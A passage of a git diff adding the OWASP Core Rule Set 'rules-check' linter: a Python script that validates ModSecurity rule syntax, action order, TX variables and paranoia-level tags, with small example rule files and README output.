(inbound|outbout)_anomaly_score variable or value: invalid value for anomaly_score_pl1: tx.error_anomaly_score with severity critical, rule id: 920160 + file=examples/test8.conf, line=44, endLine=44, title=wrong (inbound|outbout)_anomaly_score variable or value: missing severity action, rule id: 920161 + file=examples/test8.conf, line=53, endLine=53, title=wrong (inbound|outbout)_anomaly_score variable or value: variable inbound_anomaly_score_pl2 on PL 1, rule id: 920162 + There are one or more unset TX variables. + file=examples/test8.conf, line=53, endLine=53, title=unset TX variable: TX variable 'critical_anomaly_score' not set / later set (rvar) in rule 920162 +End of checking parsed rules +Cumulated report about unused TX variables + No unused TX variable +$ echo $? +1 +``` + +### Test 9 - check state of used TX variables + + +``` +SecRule TX:foo "@rx bar" \ + "id:1001,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx ^.*$" \ + "id:1002,\ + phase:1,\ + pass,\ + nolog,\ + setvar:tx.bar=1" +``` + +In this rule file, there are more problems: +* rule 1001 used an uninitialized variable (`TX:foo`) +* rule 1002 sets a TX variable which never used diff --git a/nginx/config/owasp-crs/util/crs-rules-check/TODO.txt b/nginx/config/owasp-crs/util/crs-rules-check/TODO.txt new file mode 100644 index 00000000..578a70d6 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/TODO.txt @@ -0,0 +1,5 @@ + +* Add more checks + * check 'mandatory' actions, eg. `phase` + * check existing of necessary `tag`, eg. `OWASP_CRS/$$VER$$` + * check existing of `ver` action diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test1.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test1.conf new file mode 100644 index 00000000..3366b13a --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test1.conf @@ -0,0 +1,10 @@ +SecRule &ARGS_GET "@eq 3" \ + "id:1,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain + SecRule ARGS_GET:foo "@rx bar" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.some_vars=1' diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test2.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test2.conf new file mode 100644 index 00000000..7b7d4eab --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test2.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "@beginswith /index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test3.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test3.conf new file mode 100644 index 00000000..2cd9d44e --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test3.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "@beginsWith /index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test4.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test4.conf new file mode 100644 index 00000000..00bc8374 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test4.conf @@ -0,0 +1,17 @@ + SecRule ARGS "@rx foo" \ + "id:1,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:2,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:3,\ + phase:1,\ + pass,\ + nolog" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test5.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test5.conf new file mode 100644 index 00000000..22638f34 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test5.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test6.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test6.conf new file mode 100644 index 00000000..63f6c9fe --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test6.conf @@ -0,0 +1,7 @@ +SecRule ARGS "@rx attack" \ + "id:1,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + ctl:auditLogParts=+E" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test7.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test7.conf new file mode 100644 index 00000000..40530136 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test7.conf @@ -0,0 +1,14 @@ + +SecRule ARGS "@rx foo" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" + +SecRule ARGS_NAMES "@rx bar" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test8.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test8.conf new file mode 100644 index 00000000..bd54046b --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test8.conf @@ -0,0 +1,56 @@ + +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.blocking_paranoia_level=1'" + +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920161,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920162,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/examples/test9.conf b/nginx/config/owasp-crs/util/crs-rules-check/examples/test9.conf new file mode 100644 index 00000000..d81d69fa --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/examples/test9.conf @@ -0,0 +1,13 @@ + +SecRule TX:foo "@rx bar" \ + "id:1001,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx ^.*$" \ + "id:1002,\ + phase:1,\ + pass,\ + nolog,\ + setvar:tx.bar=1" diff --git a/nginx/config/owasp-crs/util/crs-rules-check/requirements.txt b/nginx/config/owasp-crs/util/crs-rules-check/requirements.txt new file mode 100644 index 00000000..a9894876 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/requirements.txt @@ -0,0 +1 @@ +msc-pyparser>=1.2.1 diff --git a/nginx/config/owasp-crs/util/crs-rules-check/rules-check.py b/nginx/config/owasp-crs/util/crs-rules-check/rules-check.py new file mode 100755 index 00000000..1a4384a4 --- /dev/null +++ b/nginx/config/owasp-crs/util/crs-rules-check/rules-check.py @@ -0,0 +1,889 @@ +#!/usr/bin/env python3 + +import sys +import os +import glob +import msc_pyparser +import difflib +import argparse +import re + +oformat = "native" + +class Check(object): + def __init__(self, data, txvars): + + # txvars is a global used hash table, but processing of rules is a sequential flow + # all rules need this global table + self.globtxvars = txvars + # list available operators, actions, transformations and ctl args + self.operators = "beginsWith|containsWord|contains|detectSQLi|detectXSS|endsWith|eq|fuzzyHash|geoLookup|ge|gsbLookup|gt|inspectFile|ipMatch|ipMatchF|ipMatchFromFile|le|lt|noMatch|pmFromFile|pmf|pm|rbl|rsub|rx|streq|strmatch|unconditionalMatch|validateByteRange|validateDTD|validateHash|validateSchema|validateUrlEncoding|validateUtf8Encoding|verifyCC|verifyCPF|verifySSN|within".split("|") + self.operatorsl = [o.lower() for o in self.operators] + self.actions = "accuracy|allow|append|auditlog|block|capture|chain|ctl|deny|deprecatevar|drop|exec|expirevar|id|initcol|logdata|log|maturity|msg|multiMatch|noauditlog|nolog|pass|pause|phase|prepend|proxy|redirect|rev|sanitiseArg|sanitiseMatched|sanitiseMatchedBytes|sanitiseRequestHeader|sanitiseResponseHeader|setenv|setrsc|setsid|setuid|setvar|severity|skipAfter|skip|status|tag|t|ver|xmlns".split("|") + self.actionsl = [a.lower() for a in self.actions] + self.transforms = "base64DecodeExt|base64Decode|base64Encode|cmdLine|compressWhitespace|cssDecode|escapeSeqDecode|hexDecode|hexEncode|htmlEntityDecode|jsDecode|length|lowercase|md5|none|normalisePathWin|normalisePath|normalizePathWin|normalizePath|parityEven7bit|parityOdd7bit|parityZero7bit|removeCommentsChar|removeComments|removeNulls|removeWhitespace|replaceComments|replaceNulls|sha1|sqlHexDecode|trimLeft|trimRight|trim|uppercase|urlDecodeUni|urlDecode|urlEncode|utf8toUnicode".split("|") + self.transformsl = [t.lower() for t in self.transforms] + self.ctls = "auditEngine|auditLogParts|debugLogLevel|forceRequestBodyVariable|hashEnforcement|hashEngine|requestBodyAccess|requestBodyLimit|requestBodyProcessor|responseBodyAccess|responseBodyLimit|ruleEngine|ruleRemoveById|ruleRemoveByMsg|ruleRemoveByTag|ruleRemoveTargetById|ruleRemoveTargetByMsg|ruleRemoveTargetByTag".split("|") + self.ctlsl = [c.lower() for c in self.ctls] + + # list the actions in expected order + # see wiki: https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Order-of-ModSecurity-Actions-in-CRS-rules + # note, that these tokens are with lovercase here, but used only for to check the order + self.ordered_actions = [ + "id", # 0 + "phase", # 1 + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", # 10 + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitisearg", + "sanitiserequestheader", # 20 + "sanitisematched", + "sanitisematchedbytes", + "ctl", + "ver", + "severity", + "multimatch", + "initcol", + "setenv", + "setvar", + "expirevar", # 30 + "chain", + "skip", + "skipafter", + ] + + self.data = data # holds the parsed data + self.current_ruleid = 0 # holds the rule id + self.curr_lineno = 0 # current line number + self.chained = False # holds the chained flag + self.caseerror = [] # list of case mismatch errors + self.orderacts = [] # list of ordered action errors + self.auditlogparts = [] # list of wrong ctl:auditLogParts + self.undef_txvars = [] # list of undefined TX variables + self.pltags = [] # list of incosistent PL tags + self.plscores = [] # list of incosistent PL scores + self.dupes = [] # list of duplicated id's + self.ids = {} # list of rule id's + + self.re_tx_var = re.compile("%\{\}") + + def store_error(self, msg): + # store the error msg in the list + self.caseerror.append({ + 'ruleid' : 0, + 'line' : self.curr_lineno, + 'endLine': self.curr_lineno, + 'message': msg + }) + + def check_ignore_case(self): + # check the ignore cases at operators, actions, + # transformations and ctl arguments + for d in self.data: + if "actions" in d: + aidx = 0 # index of action in list + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + a = d['actions'][aidx] # 'a' is the action from the list + + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + if a['act_name'] == "chain": + self.chained = True + + # check the action is valid + if a['act_name'].lower() not in self.actionsl: + self.store_error("Invalid action", a['act_name']) + # check the action case sensitive format + if self.actions[self.actionsl.index(a['act_name'].lower())] != a['act_name']: + self.store_error("Action case mismatch: %s" % a['act_name']) + + if a['act_name'] == 'ctl': + # check the ctl argument is valid + if a['act_arg'].lower() not in self.ctlsl: + self.store_error("Invalid ctl", a['act_arg']) + # check the ctl argument case sensitive format + if self.ctls[self.ctlsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Ctl case mismatch: %s" % a['act_arg']) + if a['act_name'] == 't': + # check the transform is valid + if a['act_arg'].lower() not in self.transformsl: + self.store_error("Invalid transform: %s" % a['act_arg']) + # check the transform case sensitive format + if self.transforms[self.transformsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Transform case mismatch : %s" % a['act_arg']) + aidx += 1 + if "operator" in d and d["operator"] != "": + self.curr_lineno = d['oplineno'] + # strip the operator + op = d['operator'].replace("!", "").replace("@", "") + # check the operator is valid + if op.lower() not in self.operatorsl: + self.store_error("Invalid operator: %s" % d['operator']) + # check the operator case sensitive format + if self.operators[self.operatorsl.index(op.lower())] != op: + self.store_error("Operator case mismatch: %s" % d['operator']) + else: + if d['type'].lower() == "secrule": + self.curr_lineno = d['lineno'] + self.store_error("Empty operator isn't allowed") + if self.current_ruleid > 0: + for e in self.caseerror: + e['ruleid'] = self.current_ruleid + e['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_action_order(self): + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + max_order = 0 # maximum position of read actions + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if chained + if a['act_name'] == "chain": + self.chained = True + + # get the index of action from the ordered list + # above from constructor + try: + act_idx = self.ordered_actions.index(a['act_name'].lower()) + except ValueError: + print("ERROR: '%s' not in actions list!" % (a['act_name'])) + sys.exit(-1) + + # if the index of current action is @ge than the previous + # max value, load it into max_order + if act_idx >= max_order: + max_order = act_idx + else: + # prevact is the previous action's position in list + # act_idx is the current action's position in list + # if the prev is @gt actually, means it's at wrong position + if self.ordered_actions.index(prevact) > act_idx: + self.orderacts.append({ + 'ruleid' : 0, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "action '%s' at pos %d is wrong place against '%s' at pos %d" % (prevact, pidx, a['act_name'], aidx,) + }) + prevact = a['act_name'].lower() + pidx = aidx + aidx += 1 + for a in self.orderacts: + if a['ruleid'] == 0: + a['ruleid'] = self.current_ruleid + a['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_ctl_audit_log(self): + """check there is no ctl:auditLogParts action in any rules""" + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if action is ctl:auditLogParts + if a['act_name'].lower() == "ctl" and a['act_arg'].lower() == "auditlogparts": + self.auditlogparts.append({ + 'ruleid' : self.current_ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "" + }) + + aidx += 1 + + def collect_tx_variable(self, fname): + """collect TX variables in rules + this function collects the TX variables at rules, + if the variable is at a 'setvar' action's left side, eg + setvar:tx.foo=bar + + Because this rule called before any other check, + additionally it checks the duplicated rule ID + """ + chained = False + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + if chained == False: + ruleid = 0 # ruleid + phase = 2 # works only in Apache, libmodsecurity uses default phase 1 + else: + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if ruleid in self.ids: + self.dupes.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "id %d is duplicated, previous place: %s:%d" % (ruleid, self.ids[ruleid]['fname'], self.ids[ruleid]['lineno']) + }) + else: + self.ids[ruleid] = {'fname': fname, 'lineno': a['lineno']} + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() + # set TX variable if there is no such key + # OR + # key exists but the existing struct's phase is higher + if (txv[0] not in self.globtxvars or self.globtxvars[txv[0]]['phase'] > phase) and \ + not re.search("%\{[^%]+\}", txv[0]): + self.globtxvars[txv[0]] = { + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : a['lineno'], + 'endLine': a['lineno'] + } + else: + pass + aidx += 1 + + def check_tx_variable(self, fname): + """this function checks if a used TX variable has set + + a variable is used when: + * it's an operator argument: "@rx %{TX.foo}" + * it's a target: SecRule TX.foo "@..." + * it's a right side value in a value giving: setvar:tx.bar=tx.foo + + this function collects the variables if it is used but not set previously + """ + check_exists = None # set if rule checks the existence of varm eg `&TX:foo "@eq 1"` + has_disruptive = False # set if rule contains disruptive action + chained = False + for d in self.data: + if d['type'].lower() in ["secrule", "secaction"]: + aidx = 0 # stores the index of current action + if chained == False: + phase = 2 # works only in Apache, libmodsecurity uses default phase 1 + ruleid = 0 + else: + chained = False + + # iterate over actions and collect these values: + # ruleid, phase, chained, rule has or not any disruptive action + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] in ['block', 'deny', 'drop', 'allow', 'proxy', 'redirect']: + has_disruptive = True + + # check wheter tx.var is used at setvar's right side + val_act = [] + val_act_arg = [] + # example: + # setvar:'tx.inbound_anomaly_score_threshold=5' + # + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + # example2 (same as above, but no single quotes!): + # setvar:tx.inbound_anomaly_score_threshold=5 + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + if "act_arg" in a and a['act_arg'] is not None: + val_act = re.findall("%\{(tx.[^%]*)\}", a['act_arg'], re.I) + if "act_arg_val" in a and a['act_arg_val'] is not None: + val_act_arg = re.findall("%\{(tx.[^%]*)\}", a['act_arg_val'], re.I) + for v in val_act + val_act_arg: + v = v.lower().replace("tx.", "") + # check whether the variable is a captured var, eg TX.1 - we do not care that case + if not re.match("^\d$", v, re.I): + # v holds the tx.ANY variable, but not the captured ones + # we should collect these variables + if (v not in self.globtxvars or phase < self.globtxvars[v]['phase']): + self.undef_txvars.append({ + 'var' : v, + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "TX variable '%s' not set / later set (rvar) in rule %d" % (v, ruleid) + }) + else: + self.globtxvars[v]['used'] = True + else: + if v in self.globtxvars: + self.globtxvars[v]['used'] = True + aidx += 1 + + if "operator_argument" in d: + oparg = re.findall("%\{(tx.[^%]*)\}", d['operator_argument'], re.I) + if oparg: + for o in oparg: + o = o.lower() + o = re.sub("tx\.", "", o, re.I) + if (o not in self.globtxvars or phase < self.globtxvars[o]['phase']) and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o) and \ + check_exists is None: + self.undef_txvars.append({ + 'var' : o, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (OPARG) in rule %d" % (o, ruleid) + }) + elif o in self.globtxvars and phase >= self.globtxvars[o]['phase'] and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o): + self.globtxvars[o]['used'] = True + if "variables" in d: + for v in d['variables']: + # check if the variable is TX and has not a & prefix, which counts + # the variable length + if v['variable'].lower() == "tx": + if v['counter'] != True: + # * if the variable part (after '.' or ':') is not there in + # the list of collected TX variables, and + # * not a numeric, eg TX:2, and + # * not a regular expression, between '/' chars, eg TX:/^foo/ + # OR + # * rule's phase lower than declaration's phase + rvar = v['variable_part'].lower() + if (rvar not in self.globtxvars or (ruleid != self.globtxvars[rvar]['ruleid'] and phase < self.globtxvars[rvar]['phase'])) and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.undef_txvars.append({ + 'var' : rvar, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (VAR)" % (v['variable_part']) + }) + elif rvar in self.globtxvars and phase >= self.globtxvars[rvar]['phase'] and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.globtxvars[rvar]['used'] = True + else: + check_exists = True + self.globtxvars[v['variable_part'].lower()] = { + 'var' : v['variable_part'].lower(), + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : d['lineno'], + 'endLine': d['lineno'] + } + if has_disruptive == True: + self.globtxvars[v['variable_part'].lower()]['used'] = True + if len(self.undef_txvars) > 0 and self.undef_txvars[-1]['var'] == v['variable_part'].lower(): + del(self.undef_txvars[-1]) + if chained == False: + check_exists = None + has_disruptive = False + + def check_pl_consistency(self): + """this method checks the PL consistency + + the function iterates through the rules, and catches the set PL, eg: + + SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" ... + this means we are on PL1 currently + + all rules must consist with current PL at the used tags and variables + + eg: + tag:'paranoia-level/1' + ^ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + ^^^ + additional relations: + * all rules must have the "tag:'paranoia-level/N'" if it does not have "nolog" action + * if rule have "nolog" action it must not have "tag:'paranoia-level/N'" action + * anomaly scoring value on current PL must increment by value corresponding to severity + + """ + curr_pl = 0 + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # nolog action exists + + for d in self.data: + # find the current PL + if d['type'].lower() in ["secrule"]: + for v in d['variables']: + if v['variable'].lower() == "tx" and \ + v['variable_part'].lower() == "detection_paranoia_level" and \ + d['operator'] == "@lt" and re.match("^\d$", d['operator_argument']): + curr_pl = int(d['operator_argument']) + + if "actions" in d: + aidx = 0 # stores the index of current action + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "severity": + severity = a['act_arg'].replace("'", "").lower() + if a['act_name'] == "tag": + tags.append(a) + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + # this hack necessary, because sometimes we use setvar argument + # between '', sometimes not + # eg + # setvar:crs_setup_version=334 + # setvar:'tx.inbound_anomaly_score_threshold=5' + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() # variable name + if len(txv) > 1: + txv[1] = txv[1].lower().strip("+\{\}") # variable value + else: + txv.append(a['act_arg_val'].strip("+\{\}")) + _txvars[txv[0]] = txv[1] + _txvlines[txv[0]] = a['lineno'] + if a['act_name'] == "nolog": + has_nolog = True + if a['act_name'] == "chain": + chained = True + aidx += 1 + + has_pl_tag = False + for a in tags: + if a['act_arg'][0:14] == "paranoia-level": + has_pl_tag = True + pltag = int(a['act_arg'].split("/")[1]) + if has_nolog: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' with 'nolog' action, rule id: %d" % (a['act_arg'], ruleid) + }) + elif pltag != curr_pl and curr_pl > 0: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' on PL %d, rule id: %d" % (a['act_arg'], curr_pl, ruleid) + }) + + if has_pl_tag != True and has_nolog == False and curr_pl >= 1: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "rule does not have `paranoia-level/%d` action, rule id: %d" % (curr_pl, ruleid) + }) + + for t in _txvars: + subst_val = re.search("%{tx.[a-z]+_anomaly_score}", _txvars[t], re.I) + val = re.sub("[\+\%\{\}]", "", _txvars[t]).lower() + scorepl = re.search("anomaly_score_pl\d$", t) # check if last char is a numeric, eg ...anomaly_score_pl1 + if scorepl: + if curr_pl > 0 and int(t[-1]) != curr_pl: + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "variable %s on PL %d, rule id: %d" % (t, curr_pl, ruleid) + }) + if severity is None and subst_val: # - do we need this? + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "missing severity action, rule id: %d" % (ruleid) + }) + else: + if val != 'tx.%s_anomaly_score' % (severity) and val != "0": + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "invalid value for anomaly_score_pl%d: %s with severity %s, rule id: %d" % (int(t[-1]), val, severity, ruleid) + }) + # variable has found so we need to mark it as used + self.globtxvars[t]['used'] = True + + # reset local variables if we are done with a rule <==> no more 'chain' action + if chained == False: + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # rule has nolog action + +def remove_comments(data): + """ + In some special cases, remove the comments from the beginning of the lines. + + A special case starts when the line has a "SecRule" or "SecAction" token at + the beginning and ends when the line - with or without a comment - is empty. + + Eg.: + 175 # Uncomment this rule to change the default: + 176 # + 177 #SecAction \ + 178 # "id:900000,\ + 179 # phase:1,\ + 180 # pass,\ + 181 # t:none,\ + 182 # nolog,\ + 183 # setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + In this case, the comments from the beginning of lines 177 and 183 are deleted and + evaluated as follows: + + 175 # Uncomment this rule to change the default: + 176 # + 177 SecAction \ + 178 "id:900000,\ + 179 phase:1,\ + 180 pass,\ + 181 t:none,\ + 182 nolog,\ + 183 setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + """ + _data = [] # new structure by lines + lines = data.split("\n") + marks = re.compile("^#(| *)(SecRule|SecAction)", re.I) # regex what catches the rules + state = 0 # hold the state of the parser + for l in lines: + # if the line starts with #SecRule, #SecAction, # SecRule, # SecAction, set the marker + if marks.match(l): + state = 1 + # if the marker is set and the line is empty or contains only a comment, unset it + if state == 1 and l.strip() in ["", "#"]: + state = 0 + + # if marker is set, remove the comment + if state == 1: + _data.append(re.sub("^#", "", l)) + else: + _data.append(l) + + data = "\n".join(_data) + + return data + +def errmsg(msg): + if oformat == "github": + print("::error %s" % (msg)) + else: + print(msg) + +def errmsgf(msg): + if oformat == "github": + if 'message' in msg and msg['message'].strip() != "": + print("::error%sfile={file},line={line},endLine={endLine},title={title}: {message}".format(**msg) % (msg['indent']*" ")) + else: + print("::error%sfile={file},line={line},endLine={endLine},title={title}".format(**msg) % (msg['indent']*" ")) + else: + if 'message' in msg and msg['message'].strip() != "": + print("%sfile={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg) % (msg['indent']*" ")) + else: + print("%sfile={file}, line={line}, endLine={endLine}, title={title}".format(**msg) % (msg['indent']*" ")) + +def msg(msg): + if oformat == "github": + print("::debug %s" % (msg)) + else: + print(msg) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="CRS Rules Check tool") + parser.add_argument("-o", "--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument("-r", "--rules", metavar='/path/to/coreruleset/*.conf', type=str, + nargs='*', help='Directory path to CRS rules', required=True, + action="append") + args = parser.parse_args() + + crspath = [] + for l in args.rules: + crspath += l + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + retval = 0 + try: + flist = crspath + flist.sort() + except: + errmsg("Can't open files in given path!") + sys.exit(1) + + if len(flist) == 0: + errmsg("List of files is empty!") + sys.exit(1) + + parsed_structs = {} + txvars = {} + + for f in flist: + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + # modify the content of the file, if it is the "crs-setup.conf.example" + if f.startswith("crs-setup.conf.example"): + data = remove_comments(data) + except: + errmsg("Can't open file: %s" % f) + sys.exit(1) + + ### check file syntax + msg("Config file: %s" % (f)) + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + msg(" Parsing ok.") + parsed_structs[f] = mparser.configlines + except Exception as e: + err = e.args[1] + if err['cause'] == "lexer": + cause = "Lexer" + else: + cause = "Parser" + errmsg("Can't parse config file: %s" % (f)) + errmsgf({ + 'indent' : 2, + 'file' : f, + 'title' : "%s error" % (cause), + 'line' : err['line'], + 'endLine': err['line'], + 'message': "can't parse file"}) + retval = 1 + continue + + msg("Checking parsed rules...") + for f in parsed_structs.keys(): + + msg(f) + c = Check(parsed_structs[f], txvars) + + ### check case usings + c.check_ignore_case() + if len(c.caseerror) == 0: + msg(" Ignore case check ok.") + else: + errmsg(" Ignore case check found error(s)") + for a in c.caseerror: + a['indent'] = 2 + a['file'] = f + a['title'] = "Case check" + errmsgf(a) + retval = 1 + + ### check action's order + c.check_action_order() + if len(c.orderacts) == 0: + msg(" Action order check ok.") + else: + errmsg(" Action order check found error(s)") + for a in c.orderacts: + a['indent'] = 2 + a['file'] = f + a['title'] = 'Action order check' + errmsgf(a) + retval = 1 + + ### make a diff to check the indentations + try: + with open(f, 'r') as fp: + fromlines = fp.readlines() + if f.startswith("crs-setup.conf.example"): + fromlines = remove_comments("".join(fromlines)).split("\n") + fromlines = [l + "\n" for l in 